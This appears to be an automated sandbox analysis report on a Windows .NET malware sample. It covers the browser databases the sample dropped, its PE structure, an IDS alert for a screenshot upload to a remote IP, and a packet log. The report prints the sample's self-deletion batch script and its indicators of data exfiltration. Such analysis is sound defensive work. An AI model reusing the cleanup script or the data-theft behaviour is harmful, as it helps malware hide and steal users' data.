                                                    Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):0.08231524779339361
                                                    Encrypted:false
                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):294912
                                                    Entropy (8bit):0.08434615749937499
                                                    Encrypted:false
                                                    SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                                    MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                                    SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                                    SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                                    SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):122880
                                                    Entropy (8bit):1.1414673161713362
                                                    Encrypted:false
                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):57344
                                                    Entropy (8bit):0.7310370201569906
                                                    Encrypted:false
                                                    SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                    MD5:A802F475CA2D00B16F45FEA728F2247C
                                                    SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                    SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                    SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):122880
                                                    Entropy (8bit):1.1414673161713362
                                                    Encrypted:false
                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):122880
                                                    Entropy (8bit):1.1414673161713362
                                                    Encrypted:false
                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.86528072116055
                                                    Encrypted:false
                                                    SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                    MD5:8CC409C8658C3F05143C1484A1719879
                                                    SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                    SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                    SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                    Category:dropped
                                                    Size (bytes):135168
                                                    Entropy (8bit):1.0873605234887023
                                                    Encrypted:false
                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                    Category:dropped
                                                    Size (bytes):135168
                                                    Entropy (8bit):1.0873605234887023
                                                    Encrypted:false
                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                    Category:dropped
                                                    Size (bytes):135168
                                                    Entropy (8bit):1.0873605234887023
                                                    Encrypted:false
                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.4026573159402624
                                                    Encrypted:false
                                                    SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                    MD5:F49DFF163167A43F4940B7337A092C07
                                                    SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                    SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                    SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):107
                                                    Entropy (8bit):5.190724786127888
                                                    Encrypted:false
                                                    SSDEEP:3:HFTEOuMJcFKsokMlwBRZDEXEPONy+Wzbnnvn:yOuMJN/lweonRnvn
                                                    MD5:C79B119F0EEF08776E4A857C87CECA82
                                                    SHA1:3D546F58AC78F26D4896767525A46F5A0DFC7F7E
                                                    SHA-256:13EB3FEE3292E5EAD718A9EFDE4D91A72037B6A2788CEC423AF691B0E765FEF7
                                                    SHA-512:433845FD6AED1756AD9B74972C7F5D02FD48388FECCDE18CCF61BCFCF41D9484828CB593DB4394DE594DC381EB54014AF5E5D93C1048745BECD268A52772211A
                                                    Malicious:false
                                                    Preview:chcp 65001..TaskKill /F /IM 3364..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\VaXmr82RIb.exe"..
                                                    Process:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):103985
                                                    Entropy (8bit):6.082865991437579
                                                    Encrypted:false
                                                    SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                                    MD5:6DE273C47E7F54F2910BC516F886633B
                                                    SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                                    SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                                    SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                                    Malicious:false
                                                    Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.7259797125044
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:VaXmr82RIb.exe
                                                    File size:816'640 bytes
                                                    MD5:3e11e285b883807eb038196ea1de3cf8
                                                    SHA1:b7346061f7e70ecabf1831fe964e4d0080b31ea9
                                                    SHA256:1003ed3cc55ba1b802f8c831b6f29dc304b163c58c222f884a22ce338fdf75c0
                                                    SHA512:9a7a0165b0879f86a2f34ad520d71fd9ad9fbfa0bf082e3cab4933cd110b4ebcf3f52a4187111d610dc990d9f9925e4cf20e778fa312eeae0f94d4b904f907e3
                                                    SSDEEP:12288:tedxZHQOCIdXI6QsZ5bzxniR95bh/wYyT9df5+LHCpFHdfcD4aPC4m+zux9v1SJG:8XpdXIJsZbMHdcbILHCp1Fm4C1mNvuO
                                                    TLSH:0505010AAFDC4F66CA891339943603514AF297D5F58BF3C63719B5F836077A0D8123AA
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-..........."...0..............*... ........@.. ....................................`................................
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x4b2a01
                                                    Entrypoint Section:.4j;
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xF12D1FC7 [Fri Mar 21 18:51:51 2098 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [004AC000h]
                                                    scasb
                                                    xchg eax, edi
                                                    mov esi, 3A4E660Ah
                                                    mov al, C7h
                                                    adc eax, 167A471Ah
                                                    cmc
                                                    mov dl, 01h
                                                    jmp 00007F17879AD207h
                                                    out 93h, al
                                                    ror bh, cl
                                                    imul eax, dword ptr [ebp-2Eh], 73h
                                                    mov ch, bh
                                                    jmp 00007F17F08F637Ch
                                                    add byte ptr [ebp+ecx*4-7DF4E0A4h], dh
                                                    jl 00007F17F08F636Bh
                                                    call far fword ptr [AF1F1CEDh]
                                                    pop ss
                                                    jmp 00007F180E837527h
                                                    in eax, dx
                                                    pop ds
                                                    ret
                                                    jp 00007F17F08F640Ch
                                                    dec edx
                                                    pop es
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb65500x28.4j;
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1740000x150c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1760000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14d9400x38.4j;
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0xac0000x8.#x#
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x14d9800x48.4j;
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x296680x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .<':0x2c0000x7e9fb0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .#x#0xac0000x80x2004f2638cb3b6a24a282cbbeca87b56073False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .4j;0xae0000xc57e40xc580024fb1d714a4d8fc0e6492436db4ec171False0.8477489616297469data7.738212847633549IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1740000x150c0x16004aca51f7947e6d4e11e521346919a785False0.3913352272727273data5.415068697758594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1760000xc0x200dc014d2388db9a92e9c7b59c63685ea4False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x1740900x340data0.45072115384615385
                                                    RT_MANIFEST0x1743e00x1126XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.40387243735763095
                                                    DLLImport
                                                    mscoree.dll_CorExeMain
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-04T14:44:39.658760+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.204974789.23.100.2331488TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 4, 2024 14:44:32.482964039 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:32.609236002 CET8049746104.16.184.241192.168.11.20
                                                    Dec 4, 2024 14:44:32.610553980 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:32.610554934 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:32.736851931 CET8049746104.16.184.241192.168.11.20
                                                    Dec 4, 2024 14:44:32.748589993 CET8049746104.16.184.241192.168.11.20
                                                    Dec 4, 2024 14:44:32.799587011 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:38.597053051 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:38.859251976 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:38.859435081 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:38.861116886 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:38.862515926 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:38.989793062 CET8049746104.16.184.241192.168.11.20
                                                    Dec 4, 2024 14:44:38.990005970 CET4974680192.168.11.20104.16.184.241
                                                    Dec 4, 2024 14:44:39.129076004 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.131422997 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.132627010 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.132677078 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.132755041 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.132916927 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.393357992 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.394532919 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.394732952 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.394891024 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.394918919 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.395100117 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.395184994 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.395210028 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.395226955 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.395267010 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.395631075 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.395782948 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.656881094 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.657058954 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657227039 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.657227993 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657392025 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.657398939 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657573938 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657738924 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657896996 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.657902956 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.657927990 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.658078909 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.658154964 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.658230066 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.658416986 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.658462048 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.658760071 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.658930063 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.919455051 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.919727087 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.919728994 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.919903994 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.919970989 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.920066118 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.920233965 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.920408010 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.921916008 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.921947002 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.921967983 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.921988010 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.922008038 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.922030926 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.922071934 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.922087908 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:39.922102928 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:39.922287941 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:40.181874990 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182082891 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182394028 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182403088 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182440996 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182447910 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182735920 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182775974 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.182784081 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.183032990 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184338093 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184346914 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184556961 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184566975 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184848070 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184856892 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:40.184863091 CET14884974789.23.100.233192.168.11.20
